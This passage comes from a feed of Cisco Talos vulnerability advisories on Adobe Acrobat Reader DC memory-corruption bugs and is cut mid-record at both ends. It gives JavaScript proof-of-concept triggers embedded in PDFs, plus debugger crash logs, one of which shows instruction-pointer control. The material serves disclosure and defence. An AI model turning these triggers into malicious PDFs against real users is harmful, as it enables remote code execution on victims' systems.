d0d0d0d0\n 2c2fb030 72656b63 00000000 c0c0c0c0 c0c0c0c0\n 2c2fb040 00000000 00000000 00000000 00000000\n 2c2fb050 00000000 00000000 00000000 00000000\n 2c2fb060 00000000 00000000 00000000 00000000\n 2c2fb070 00000000 00000000 00000000 00000000\n \n\nThis brings us to the consequence of this type confusion. Listing the immediately following code reveals the problem:\n \n \n 57797582 59 pop ecx\n 57797583 59 pop ecx\n 57797584 85c0 test eax,eax\n 57797586 743d je Annots!PlugInMain+0x736c4 (577975c5)\n 57797588 8b10 mov edx,dword ptr [eax]\n 5779758a 8d4df0 lea ecx,[ebp-10h]\n 5779758d 51 push ecx\n 5779758e 8bc8 mov ecx,eax\n 57797590 ff521c call dword ptr [edx+1Ch]\n \n\nIf `eax` isn\u2019t null, a pointer value is read into `edx` and is subsequently dereferenced in a `call` instruction. 
Because `eax` now points to a wrong object type, this can possibly result in control flow hijacking and arbitrary code execution. Indeed, continuing the execution leads to a crash due to the instruction pointer pointing to an invalid location.\n\n### Crash Information\n\nCrash with full page heap enabled:\n \n \n 0:000> g\n (143c.12e0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=2c2fb000 ebx=00000000 ecx=2c2fb000 edx=33b93000 esi=24cdf000 edi=332b7000\n eip=c0c0c0c0 esp=0023c8d4 ebp=0023c8fc iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n c0c0c0c0 ?? ???\n 0:000> k\n # ChildEBP RetAddr \n WARNING: Frame IP not in any known module. Following frames may be wrong.\n 00 0023c8d0 57797593 0xc0c0c0c0\n 01 0023c8fc 59b0d6ca Annots!PlugInMain+0x73692\n 02 0023c96c 59b11c50 EScript!mozilla::HashBytes+0x2d054\n 03 0023c99c 59ae388f EScript!mozilla::HashBytes+0x315da\n 04 0023ca2c 59ae32f3 EScript!mozilla::HashBytes+0x3219\n 05 0023ca48 59b0d235 EScript!mozilla::HashBytes+0x2c7d\n 06 0023ca94 59b0d1c8 EScript!mozilla::HashBytes+0x2cbbf\n 07 0023cab0 59b11a59 EScript!mozilla::HashBytes+0x2cb52\n 08 0023cacc 59b119f0 EScript!mozilla::HashBytes+0x313e3\n 09 0023cafc 59b2b605 EScript!mozilla::HashBytes+0x3137a\n 0a 0023cb50 59b2b505 EScript!mozilla::HashBytes+0x4af8f\n 0b 0023cb68 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 0c 0023cba8 5774506e Annots!PlugInMain+0x1b9878\n 0d 0023cbc8 578dd7b9 Annots!PlugInMain+0x2116d\n 0e 0023cbe0 59b2b61a Annots!PlugInMain+0x1b98b8\n 0f 0023cc30 59b2b505 EScript!mozilla::HashBytes+0x4afa4\n 10 0023cc48 578dd779 EScript!mozilla::HashBytes+0x4ae8f\n 11 0023cc88 5774506e Annots!PlugInMain+0x1b9878\n 12 0023cca8 57744f76 Annots!PlugInMain+0x2116d\n 13 0023cce8 577958db Annots!PlugInMain+0x21075\n 14 0023cda8 59b225d3 Annots!PlugInMain+0x719da\n 15 0023ce20 59b075ce 
EScript!mozilla::HashBytes+0x41f5d\n 0:000> dd eax\n 2c2fb000 33b93000 00000000 33b93000 d0d0d0d0\n 2c2fb010 334e5000 00000000 00000003 d0d0d0d0\n 2c2fb020 00690074 006e006f d0d00000 d0d0d0d0\n 2c2fb030 72656b63 00000000 c0c0c0c0 c0c0c0c0\n 2c2fb040 00000000 00000000 00000000 00000000\n 2c2fb050 00000000 00000000 00000000 00000000\n 2c2fb060 00000000 00000000 00000000 00000000\n 2c2fb070 00000000 00000000 00000000 00000000\n 0:000> !heap -p -a eax\n address 2c2fb000 found in\n _DPH_HEAP_ROOT @ 1241000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 2c1b3e04: 2c2fb000 8 - 2c2fa000 2000\n 66818e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77756206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7771a127 ntdll!RtlpAllocateHeap+0x000000c4\n 776e5950 ntdll!RtlAllocateHeap+0x0000023a\n 5cdced43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 5cdcee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\n 5772dff6 Annots!PlugInMain+0x0000a0f5\n 5772daf9 Annots!PlugInMain+0x00009bf8\n 577290b0 Annots!PlugInMain+0x000051af\n 57737e59 Annots!PlugInMain+0x00013f58\n 5774506e Annots!PlugInMain+0x0002116d\n 578dd7b9 Annots!PlugInMain+0x001b98b8\n 59b2b61a EScript!mozilla::HashBytes+0x0004afa4\n 59b2b505 EScript!mozilla::HashBytes+0x0004ae8f\n 578dd779 Annots!PlugInMain+0x001b9878\n 5774506e Annots!PlugInMain+0x0002116d\n \n\n### Timeline\n\n2018-04-16- Vendor Disclosure \n2018-07-10 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0590\n\nPrevious Report\n\nTALOS-2018-0624\n", "edition": 4, "modified": "2018-07-10T00:00:00", "published": "2018-07-10T00:00:00", "id": "TALOS-2018-0569", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0569", "title": "Adobe Acrobat Reader DC Collab.drivers Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:20:02", "bulletinFamily": "info", "cvelist": ["CVE-2018-4947"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0518\n\n## Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability\n\n##### May 15, 2018\n\n##### CVE Number\n\nCVE-2018-4947\n\n### Summary\n\nA specific Javascript script embedded in a PDF file can lead to a pointer to previously freed object to be reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.009.20044\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n6.8 - CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-908: Use of Uninitialized Resource\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. 
The method calls required to trigger this vulnerability are privileged and can only be called from trusted functions.\n\nAdobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and exposes additional attack surface.\n\nWhile executing the following piece of JavaScript code, a specific condition leading to memory corruption can occur (it should be noted that all three of these lines require higher privileges, meaning they must be executed in a trusted PDF file):\n \n \n var a = this.Collab.drivers;\n this.SetRSSMethods( ); \n this.ANFancyAlertImpl(this);\n \n\nUpon calling `this.ANFancyAlertImpl(this)` a memory object will be allocated. The pointer to this object is later passed to other functions without it being initialized. This leads to undefined behaviour that depends on the previous contents of the same memory region, leading to memory corruption and ultimately to arbitrary code execution.\n\nTwo pointers from the object end up being used as the last two arguments in a `memcpy` call, which can easily be abused to cause a heap-based buffer overflow:\n \n \n (660.8f0): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n DC\\Reader\\plug_ins\\Annots.api\n Reader DC\\Reader\\plug_ins\\Annots.api - \n eax=81818180 ebx=c0c0c0c0 ecx=c0c0c0c0 edx=c0c0c0c0 esi=c0c0c0c0 edi=36dbafe0\n eip=645ff26d esp=001ac70c ebp=001ac738 iopl=0 nv up ei pl nz na po cy\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210203\n MSVCR120!memcpy+0x2a:\n 645ff26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\n 0:000> k\n # ChildEBP RetAddr \n 00 001ac710 7748e62e MSVCR120!memcpy+0x2a [f:\\dd\\vctools\\crt\\crtw32\\string\\i386\\memcpy.asm @ 188] \n WARNING: Stack unwind information not available. 
Following frames may be wrong.\n 01 001ac738 7748e5a2 Annots!PlugInMain+0xa72d\n 02 001ac760 7748e3c6 Annots!PlugInMain+0xa6a1\n 03 001ac770 776412e1 Annots!PlugInMain+0xa4c5\n 04 001ac780 774f7258 Annots!PlugInMain+0x1bd3e0\n 05 001ac7ac 570bd6b2 Annots!PlugInMain+0x73357\n 06 001ac81c 570c1c35 EScript!mozilla::HashBytes+0x2d050\n 07 001ac84c 5709387b EScript!mozilla::HashBytes+0x315d3\n 08 001ac8dc 570932df EScript!mozilla::HashBytes+0x3219\n 09 001ac8f8 570bd21d EScript!mozilla::HashBytes+0x2c7d\n 0a 001ac944 570bd1b0 EScript!mozilla::HashBytes+0x2cbbb\n \n\nStepping back a couple of function calls reveals where the `memcpy` arguments come from:\n \n \n 0:000> bp Annots!PluginMain+0x1bd3db b\n breakpoint 0 redefined\n 0:000> g\n Breakpoint 0 hit\n eax=267eef94 ebx=00000000 ecx=0030c438 edx=77898090 esi=1f266fc0 edi=2902efb8\n eip=776412dc esp=0030c414 ebp=0030c41c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246\n Annots!PlugInMain+0x1bd3db:\n 776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\n 0:000> u eip-1\n Annots!PlugInMain+0x1bd3da:\n 776412db 50 push eax\n 776412dc e8cdd0e4ff call Annots!PlugInMain+0xa4ad (7748e3ae)\n 776412e1 8b4508 mov eax,dword ptr [ebp+8]\n 776412e4 8be5 mov esp,ebp\n 776412e6 5d pop ebp\n 776412e7 c20400 ret 4\n 776412ea 55 push ebp\n 776412eb 8bec mov ebp,esp\n 0:000> dd poi(eax)\n 26a5efe8 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0\n 26a5eff8 c0c0c0c0 c0c0c0c0 ???????? ????????\n 26a5f008 ???????? ???????? ???????? ????????\n 26a5f018 ???????? ???????? ???????? ????????\n 26a5f028 ???????? ???????? ???????? ????????\n 26a5f038 ???????? ???????? ???????? ????????\n 26a5f048 ???????? ???????? ???????? ????????\n 26a5f058 ???????? ???????? ???????? 
????????\n 0:000> !heap -p -a poi(eax)\n address 26a5efe8 found in\n _DPH_HEAP_ROOT @ 61000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 26954750: 26a5efb8 48 - 26a5e000 2000\n 6ac68e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 6326ed43 MSVCR120!malloc+0x00000049 [f:\\dd\\vctools\\crt\\crtw32\\heap\\malloc.c @ 92]\n 6326ee1c MSVCR120!operator new+0x0000001d [f:\\dd\\vctools\\crt\\crtw32\\heap\\new.cpp @ 59]\n 7748a048 Annots!PlugInMain+0x00006147\n 7748a00b Annots!PlugInMain+0x0000610a\n 7748daea Annots!PlugInMain+0x00009be9\n 774890a1 Annots!PlugInMain+0x000051a0\n 7748f546 Annots!PlugInMain+0x0000b645\n 774a5069 Annots!PlugInMain+0x00021168\n 7763d75e Annots!PlugInMain+0x001b985d\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\n 7763d6ab Annots!PlugInMain+0x001b97aa\n 774a5069 Annots!PlugInMain+0x00021168\n 7763d75e Annots!PlugInMain+0x001b985d\n 515db634 EScript!mozilla::HashBytes+0x0004afd2\n 515db51f EScript!mozilla::HashBytes+0x0004aebd\n 7763d6ab Annots!PlugInMain+0x001b97aa\n 774a5069 Annots!PlugInMain+0x00021168\n 774a4f71 Annots!PlugInMain+0x00021070\n 7762aaa2 Annots!PlugInMain+0x001a6ba1\n 7762aad8 Annots!PlugInMain+0x001a6bd7\n 77626588 Annots!PlugInMain+0x001a2687\n 7762af80 Annots!PlugInMain+0x001a707f\n 51f8ab90 AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3210\n 515d267d EScript!mozilla::HashBytes+0x0004201b\n 515b75b6 EScript!mozilla::HashBytes+0x00026f54\n 515b17c2 EScript!mozilla::HashBytes+0x00021160\n 515b05f0 EScript!mozilla::HashBytes+0x0001ff8e\n \n\nIn the above debugging log, we break at `Annots!PluginMain+0x1bd3db` to reveal `eax` being passed as argument to the function call points to a newly allocated and uninitialized buffer. 
With page heap enabled, the contents of the allocated memory will be filled with `0xc0c0c0c0`.\n\nThe code and memory layout after corruption just happen to line up in such a way to allow for easy `eip` control by simply adjusting the size and contents of environment variables:\n \n \n # set AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=AAAAAAAAAAAAAAAAAAAAAAAA....\n # cdb \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\n Microsoft (R) Windows Debugger Version 10.0.15063.468 X86\n Copyright (c) Microsoft Corporation. All rights reserved.\n \n \n CommandLine: \"c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"c:\\Users\\user\\Desktop\\js_memcpy_min.pdf\"\n Symbol search path is: srv*\n Executable search path is:\n ModLoad: 013b0000 015d5000 AcroRd32.exe\n ModLoad: 771b0000 772f2000 ntdll.dll\n ModLoad: 75d80000 75e55000 C:\\Windows\\system32\\kernel32.dll\n ModLoad: 75340000 7538b000 C:\\Windows\\system32\\KERNELBASE.dll\n ModLoad: 75690000 75759000 C:\\Windows\\system32\\USER32.dll\n ModLoad: 75400000 7544e000 C:\\Windows\\system32\\GDI32.dll\n ModLoad: 75f50000 75f5a000 C:\\Windows\\system32\\LPK.dll\n ModLoad: 75450000 754ed000 C:\\Windows\\system32\\USP10.dll\n ModLoad: 758d0000 7597c000 C:\\Windows\\system32\\msvcrt.dll\n ModLoad: 75f60000 76001000 C:\\Windows\\system32\\ADVAPI32.dll\n ModLoad: 761b0000 761c9000 C:\\Windows\\SYSTEM32\\sechost.dll\n ModLoad: 75550000 755f2000 C:\\Windows\\system32\\RPCRT4.dll\n ModLoad: 75a40000 75a97000 C:\\Windows\\system32\\SHLWAPI.dll\n (8b0.3f8): Break instruction exception - code 80000003 (first chance)\n eax=00000000 ebx=00000000 ecx=001bf42c edx=771f6c74 esi=fffffffe edi=00000000\n eip=772505d9 esp=001bf448 ebp=001bf474 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n ntdll!LdrpDoDebuggerBreak+0x2c:\n 772505d9 cc int 3\n 0:000> g\n ModLoad: 75e60000 75e7f000 C:\\Windows\\system32\\IMM32.DLL\n 
ModLoad: 753f0000 753f6000 C:\\Windows\\system32\\NSI.dll\n (8b0.3f8): C++ EH exception - code e06d7363 (first chance)\n ModLoad: 74f60000 74fac000 C:\\Windows\\system32\\apphelp.dll\n ModLoad: 64a70000 64ac1000 c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\sqlite.dll\n (8b0.3f8): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=046503d8 ebx=00000000 ecx=046503d8 edx=06672fc8 esi=03f75478 edi=0656ffe8\n eip=41414141 esp=001bc14c ebp=001bc174 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206\n 41414141 ?? ???\n \n\n### Crash Information\n\nCrash output with PageHeap enabled:\n \n \n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n *** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\Annots.api -\n eax=011716ce ebx=00000002 ecx=011716cc edx=011716cc esi=00000002 edi=37561000\n eip=6326f26d esp=0016c6f0 ebp=0016c71c iopl=0 nv up ei pl nz ac po cy\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\n MSVCR120!memcpy+0x2a:\n 6326f26d f3a4 rep movs byte ptr es:[edi],byte ptr [esi]\n 0:000> k\n ChildEBP RetAddr\n 0016c6f4 7748e62e MSVCR120!memcpy+0x2a\n WARNING: Stack unwind information not available. Following frames may be wrong.\n 0016c71c 7748e5a2 Annots!PlugInMain+0xa72d\n 0016c744 7748e3c6 Annots!PlugInMain+0xa6a1\n 0016c754 776412e1 Annots!PlugInMain+0xa4c5\n 0016c764 774f7258 Annots!PlugInMain+0x1bd3e0\n *** WARNING: Unable to verify checksum for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api\n *** ERROR: Symbol file could not be found. 
Defaulted to export symbols for c:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\plug_ins\\EScript.api -\n 0016c790 515bd6b2 Annots!PlugInMain+0x73357\n 0016c800 515c1c35 EScript!mozilla::HashBytes+0x2d050\n 0016c830 5159387b EScript!mozilla::HashBytes+0x315d3\n 0016c8c0 515932df EScript!mozilla::HashBytes+0x3219\n 0016c8dc 515bd21d EScript!mozilla::HashBytes+0x2c7d\n 0016c928 515bd1b0 EScript!mozilla::HashBytes+0x2cbbb\n 0016c944 515c1a3e EScript!mozilla::HashBytes+0x2cb4e\n 0016c960 515c19d5 EScript!mozilla::HashBytes+0x313dc\n 0016c990 515db61f EScript!mozilla::HashBytes+0x31373\n 0016c9e4 515db51f EScript!mozilla::HashBytes+0x4afbd\n 0016c9fc 7763d6c7 EScript!mozilla::HashBytes+0x4aebd\n 0016ca3c 774a5069 Annots!PlugInMain+0x1b97c6\n 0016ca5c 774a4f71 Annots!PlugInMain+0x21168\n 0016ca9c 7763d663 Annots!PlugInMain+0x21070\n 0016cadc 774a5069 Annots!PlugInMain+0x1b9762\n 0016cafc 7763d75e Annots!PlugInMain+0x21168\n 0016cb2c 515db634 Annots!PlugInMain+0x1b985d\n \n\n### Timeline\n\n2018-01-23 - Vendor Disclosure \n2018-05-15 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2017-0364\n\nPrevious Report\n\nTALOS-2018-0517\n", "edition": 5, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "TALOS-2018-0518", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0518", "title": "Adobe Acrobat Reader DC ANFancyAlertImpl Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:55", "bulletinFamily": "info", "cvelist": ["CVE-2018-4996"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0517\n\n## Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability\n\n##### May 15, 2018\n\n##### CVE Number\n\nCVE-2018-4996\n\n### Summary\n\nA specific Javascript script embedded in a PDF file can lead to 
a pointer to a previously freed object being reused when opening a PDF document in Adobe Acrobat Reader DC 2018.009.20044. With careful memory manipulation, this can potentially lead to sensitive memory disclosure or arbitrary code execution. In order to trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.\n\n### Tested Versions\n\nAdobe Acrobat Reader DC 2018.009.20044\n\n### Product URLs\n\n<https://get.adobe.com/reader/>\n\n### CVSSv3 Score\n\n7.1 - CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nAdobe Acrobat Reader is the most popular and most feature-rich PDF reader. It has a big user base, is usually a default PDF reader on systems and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability. Adobe Acrobat Reader DC supports embedded Javascript scripts in the PDF to allow for interactive PDF forms. This gives the potential attacker the ability to precisely control memory layout and exposes additional attack surface. When executing the following piece of Javascript in a suitable PDF document, a Use-After-Free condition can be triggered:\n \n \n try{this.Net.Discovery.queryServices( \"\", {} ); }catch(e){app.alert(e);}\n \n\nWith page heap enabled, this leads to a crash:\n \n \n eax=17a6acb8 ebx=29464fe0 ecx=29464fe0 edx=771f6c74 esi=2a064fd8 edi=2a064fd0\n eip=520e2961 esp=0031f01c ebp=0031f02c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 520e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29464ff8=????????\n 0:000>\n \n\nThe memory pointed to by `ebx` has been freed and is invalid, leading to a crash. The method `Net.Discovery.queryServices` requires privileges, and by default it would be blocked by security permissions. 
But if the source of the document is trusted, it will execute without problems and lead to a crash. In order to trigger a crash, the first argument needs to be an invalid service name. An empty string suffices.\n\nIf we track back the allocations, we can see that pointer in `ebx` is actually used as `this` in previous function calls. The pointer in `ebx` actually comes from an array of size 0x30 allocated at `Annots!PlugInMain+0x4c01`:\n \n \n 0:000> !heap -p -a eax\n address 292c2fd0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 292215b0: 292c2fd0 30 - 292c2000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 55a4ba1b Annots!PlugInMain+0x00207b1a\n 558e1e29 Annots!PlugInMain+0x0009df28\n 558e2308 Annots!PlugInMain+0x0009e407\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 
AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n \n\nSetting a write access breakpoint on the dword where the final dereferenced pointer is stored reveals where it comes from:\n \n \n 0:000> ba w 4 292c2ffc\n 0:000> dd 292c2ffc\n 0:000> g\n Breakpoint 6 hit\n eax=29d26fe0 ebx=29d26fe0 ecx=55a494c0 edx=771f6c74 esi=28a2cff8 edi=292c2fd0\n eip=55a49408 esp=0018c9e4 ebp=0018ca0c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n Annots!PlugInMain+0x205507:\n 55a49408 e86941e0ff call Annots!PlugInMain+0x9675 (5584d576)\n 0:000> dd 292c2ffc\n 292c2ffc 29d26fe0 ???????? ???????? ????????\n 0:000> !heap -p -a 29d26fe0\n address 29d26fe0 found in\n _DPH_HEAP_ROOT @ 191000\n in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)\n 2a3221d4: 29d26fe0 1c - 29d26000 2000\n 6b258e89 verifier!AVrfDebugPageHeapAllocate+0x00000229\n 77276206 ntdll!RtlDebugAllocateHeap+0x00000030\n 7723a127 ntdll!RtlpAllocateHeap+0x000000c4\n 77205950 ntdll!RtlAllocateHeap+0x0000023a\n 62f8ed43 MSVCR120!malloc+0x00000049\n 55848b02 Annots!PlugInMain+0x00004c01\n 55848ab1 Annots!PlugInMain+0x00004bb0\n 558e22e7 Annots!PlugInMain+0x0009e3e6\n 56b4267d EScript!mozilla::HashBytes+0x0004201b\n 56b275b6 EScript!mozilla::HashBytes+0x00026f54\n 56b217c2 EScript!mozilla::HashBytes+0x00021160\n 56b205f0 EScript!mozilla::HashBytes+0x0001ff8e\n 56b204fb EScript!mozilla::HashBytes+0x0001fe99\n 56b20442 EScript!mozilla::HashBytes+0x0001fde0\n 56b09e18 EScript!mozilla::HashBytes+0x000097b6\n 56b48697 EScript!mozilla::HashBytes+0x00048035\n 56b4841a EScript!mozilla::HashBytes+0x00047db8\n 56b47e8d EScript!mozilla::HashBytes+0x0004782b\n 56b46d7f 
EScript!mozilla::HashBytes+0x0004671d\n 56bb622c EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005f52d\n 6023b42f AcroRd32!AIDE::PixelPartInfo::operator=+0x000e3aaf\n 60179c7d AcroRd32!AIDE::PixelPartInfo::operator=+0x000222fd\n 601763b1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0001ea31\n 5ffcd185 AcroRd32!AX_PDXlateToHostEx+0x00159618\n 5ffcd683 AcroRd32!AX_PDXlateToHostEx+0x00159b16\n 601799da AcroRd32!AIDE::PixelPartInfo::operator=+0x0002205a\n 5fc6426f AcroRd32!PDAlternatesGetCosObj+0x0001d51f\n 5fc2b14b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x000b9c1b\n 5fba268b AcroRd32!CTJPEGWriter::CTJPEGWriter+0x0003115b\n 5fba1761 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00030231\n 5fb860d4 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014ba4\n 5fb85688 AcroRd32!CTJPEGWriter::CTJPEGWriter+0x00014158\n \n\nThis 0x1c chunk of memory is subsequently freed but is later reused resulting in a crash:\n \n \n (c20.5e8): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=17d2acb8 ebx=29d26fe0 ecx=29d26fe0 edx=771f6c74 esi=292c2fd8 edi=292c2fd0\n eip=558e2961 esp=0018eee8 ebp=0018eef8 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\n Annots!PlugInMain+0x9ea60:\n 558e2961 ff7318 push dword ptr [ebx+18h] ds:0023:29d26ff8=????????\n 0:000> dd ebx\n 29d26fe0 ???????? ???????? ???????? ????????\n 29d26ff0 ???????? ???????? ???????? ????????\n 29d27000 ???????? ???????? ???????? ????????\n 29d27010 ???????? ???????? ???????? ????????\n 29d27020 ???????? ???????? ???????? ????????\n 29d27030 ???????? ???????? ???????? ????????\n 29d27040 ???????? ???????? ???????? ????????\n 29d27050 ???????? ???????? ???????? ????????\n \n\nWith page heap disabled, this stale pointer dereference will usually succeed and result in further memory corruption. 
With proper memory layout manipulation, it could be abused to achieve arbitrary code execution.\n\nDo note that in order for the PoC to trigger this memory corruption, the PoC file needs to be added to the trusted locations list in \u201cSecurity (Enhanced)\u201d in the preferences.\n\n### Timeline\n\n2018-01-23 - Vendor Disclosure \n2018-05-15 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2018-0518\n\nPrevious Report\n\nTALOS-2017-0501\n", "edition": 6, "modified": "2018-05-15T00:00:00", "published": "2018-05-15T00:00:00", "id": "TALOS-2018-0517", "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0517", "title": "Adobe Acrobat Reader DC Net.Discovery.queryServices Remote Code Execution Vulnerability", "type": "talos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:59", "bulletinFamily": "info", "cvelist": ["CVE-2018-12815"], "description": "# Talos Vulnerability Report\n\n### TALOS-2018-0592\n\n## Adobe Acrobat Reader DC JSON Stringify Remote Code Execution Vulnerability\n\n##### July 10, 2018\n\n##### CVE Number\n\nCVE-2018-12815 \n\n### Summary\n\nSpecific JavaScript code embedded in a PDF file can lead to a use-after-free condition when opening a PDF document in Adobe Acrobat Reader DC 2018.011.20038. With careful memory manipulation, this can lead to arbitrary code execution. In 